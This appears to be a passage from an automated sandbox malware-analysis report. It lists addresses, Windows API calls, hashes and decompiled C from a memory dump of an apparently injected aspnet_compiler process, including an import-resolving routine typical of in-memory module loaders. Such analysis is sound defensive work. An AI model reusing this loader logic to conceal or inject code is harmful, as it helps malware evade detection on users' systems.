                    0x0043f66a
                    0x0043f66f
                    0x0043f677
                    0x00000000
                    0x0043f677
                    0x0043f610
                    0x0043f613
                    0x0043f615
                    0x0043f618
                    0x0043f61a
                    0x0043f61c
                    0x0043f652
                    0x0043f660
                    0x0043f666
                    0x0043f668
                    0x0043f67c
                    0x00000000
                    0x0043f67c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043f61e
                    0x0043f61e
                    0x0043f61e
                    0x0043f621
                    0x0043f624
                    0x0043f626
                    0x00000000
                    0x00000000
                    0x0043f630
                    0x0043f637
                    0x0043f63a
                    0x0043f63c
                    0x0043f644
                    0x0043f644
                    0x0043f647
                    0x0043f648
                    0x0043f64b
                    0x0043f64d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043f64d
                    0x0043f63e
                    0x0043f63f
                    0x0043f642
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043f642
                    0x0043f64f
                    0x00000000
                    0x0043f64f
                    0x0043f5c0
                    0x0043f5c2
                    0x00000000
                    0x00000000
                    0x0043f5c8
                    0x0043f5cb
                    0x0043f5cf
                    0x0043f5d2
                    0x0043f5d6
                    0x00000000
                    0x00000000
                    0x0043f5dc
                    0x0043f5dd
                    0x0043f5e0
                    0x0043f5e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043f5e4
                    0x00000000
                    0x0043f5cb
                    0x0043f58f
                    0x00000000
                    0x0043f59a
                    0x0043f57c
                    0x0043f582
                    0x00000000
                    0x0043f582
                    0x0043f6d9

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043F5F7
                    • GetLastError.KERNEL32 ref: 0043F605
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043F660
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                    • Instruction ID: 66686387026925be6180075210ad86107624aebec9d48f20dae67bb7d6d05db2
                    • Opcode Fuzzy Hash: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                    • Instruction Fuzzy Hash: 7541F831E04206AFDB218F65C846ABB7BA4DF09320F14517FF895972B1DB388D06CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004110A2 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E004110A2(intOrPtr* __ecx) {
				intOrPtr _t38;
				intOrPtr _t41;
				void _t49;
				int _t52;
				signed short _t54;
				signed int _t55;
				intOrPtr _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				signed short* _t60;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t73;
				void _t74;
				void* _t77;
				intOrPtr* _t78;
				void* _t81;
				void* _t83;
				void* _t84;

				_t78 = __ecx;
				_t77 = 1;
				_t38 =  *__ecx;
				_t58 =  *((intOrPtr*)(__ecx + 4));
				 *((intOrPtr*)(_t84 + 0x10)) = _t58;
				if( *((intOrPtr*)(_t38 + 0x84)) != 0) {
					_t81 =  *((intOrPtr*)(_t38 + 0x80)) + _t58;
					if(IsBadReadPtr(_t81, 0x14) == 0) {
						_t83 = _t81 + 0x10;
						while(1) {
							_t41 =  *((intOrPtr*)(_t83 - 4));
							if(_t41 == 0) {
								goto L24;
							}
							_t59 =  *((intOrPtr*)(_t78 + 0x24))(_t41 + _t58,  *((intOrPtr*)(_t78 + 0x34)));
							 *((intOrPtr*)(_t84 + 0x20)) = _t59;
							if(_t59 == 0) {
								SetLastError(0x7e);
								goto L23;
							} else {
								_push(4 +  *(_t78 + 0xc) * 4);
								_push( *((intOrPtr*)(_t78 + 8)));
								_t66 = E0043F7DD();
								if(_t66 == 0) {
									 *((intOrPtr*)(_t78 + 0x2c))(_t59,  *((intOrPtr*)(_t78 + 0x34)));
									SetLastError(0xe);
									L23:
									_t77 = 0;
								} else {
									 *((intOrPtr*)(_t78 + 8)) = _t66;
									 *((intOrPtr*)(_t66 +  *(_t78 + 0xc) * 4)) = _t59;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t49 =  *(_t83 - 0x10);
									if(_t49 == 0) {
										_t49 =  *_t83;
									}
									_t69 =  *((intOrPtr*)(_t84 + 0x14));
									_t74 =  *_t83;
									_t60 = _t49 + _t69;
									if( *_t60 != 0) {
										 *((intOrPtr*)(_t84 + 0x10)) = _t74 - _t60 + _t69;
										while(1) {
											_t54 =  *_t60;
											_push( *((intOrPtr*)(_t78 + 0x34)));
											if(_t54 >= 0) {
												_t55 = _t54 + _t69 + 2;
											} else {
												_t55 = _t54 & 0x0000ffff;
											}
											_t56 =  *((intOrPtr*)(_t78 + 0x28))( *((intOrPtr*)(_t84 + 0x20)), _t55);
											_t73 =  *((intOrPtr*)(_t84 + 0x1c));
											_t84 = _t84 + 0xc;
											 *((intOrPtr*)(_t73 + _t60)) = _t56;
											if( *((intOrPtr*)(_t73 + _t60)) == 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t84 + 0x14));
											_t60 =  &(_t60[2]);
											if( *_t60 != 0) {
												continue;
											} else {
											}
											goto L17;
										}
										_t77 = 0;
									}
									L17:
									if(_t77 == 0) {
										 *((intOrPtr*)(_t78 + 0x2c))( *((intOrPtr*)(_t84 + 0x1c)),  *((intOrPtr*)(_t78 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t83 = _t83 + 0x14;
										_t52 = IsBadReadPtr(_t83 - 0x10, 0x14);
										_t58 =  *((intOrPtr*)(_t84 + 0x14));
										if(_t52 == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L24;
						}
					}
					L24:
				}
				return _t77;
			}






















                    0x004110a7
                    0x004110ac
                    0x004110ad
                    0x004110af
                    0x004110b2
                    0x004110bd
                    0x004110cc
                    0x004110d7
                    0x004110dd
                    0x004110e0
                    0x004110e0
                    0x004110e5
                    0x00000000
                    0x00000000
                    0x004110f4
                    0x004110f6
                    0x004110fe
                    0x004111d4
                    0x00000000
                    0x00411104
                    0x0041110e
                    0x0041110f
                    0x00411119
                    0x0041111d
                    0x004111c9
                    0x004111d4
                    0x004111d4
                    0x004111da
                    0x00411123
                    0x00411126
                    0x00411129
                    0x0041112c
                    0x0041112f
                    0x00411134
                    0x00411136
                    0x00411136
                    0x00411139
                    0x0041113d
                    0x00411140
                    0x00411146
                    0x0041114d
                    0x00411151
                    0x00411151
                    0x00411153
                    0x00411158
                    0x00411162
                    0x0041115a
                    0x0041115a
                    0x0041115a
                    0x00411169
                    0x0041116c
                    0x00411170
                    0x00411173
                    0x0041117c
                    0x00000000
                    0x00000000
                    0x0041117e
                    0x00411182
                    0x00411188
                    0x00000000
                    0x00000000
                    0x0041118a
                    0x00000000
                    0x00411188
                    0x0041118c
                    0x0041118c
                    0x0041118e
                    0x00411190
                    0x004111b6
                    0x004111bd
                    0x00411192
                    0x00411192
                    0x0041119b
                    0x004111a1
                    0x004111a7
                    0x00000000
                    0x00000000
                    0x004111ad
                    0x004111a7
                    0x00411190
                    0x0041111d
                    0x00000000
                    0x004110fe
                    0x004110e0
                    0x004111dc
                    0x004111dc
                    0x004111e5

                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411433), ref: 004110CF
                    • IsBadReadPtr.KERNEL32(?,00000014,00411433), ref: 0041119B
                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004111BD
                    • SetLastError.KERNEL32(0000007E,00411433), ref: 004111D4
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                    • Instruction ID: 8f6c103362ea378475082746bf01fa46c2f289026e2d243d47b01123f6745c32
                    • Opcode Fuzzy Hash: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                    • Instruction Fuzzy Hash: 36418E71604305AFEB248F19DC84BA7B7E5FF48714F00482EEB46876A1EB34E845CB19
                    Uniqueness

                    Uniqueness Score: -1.00%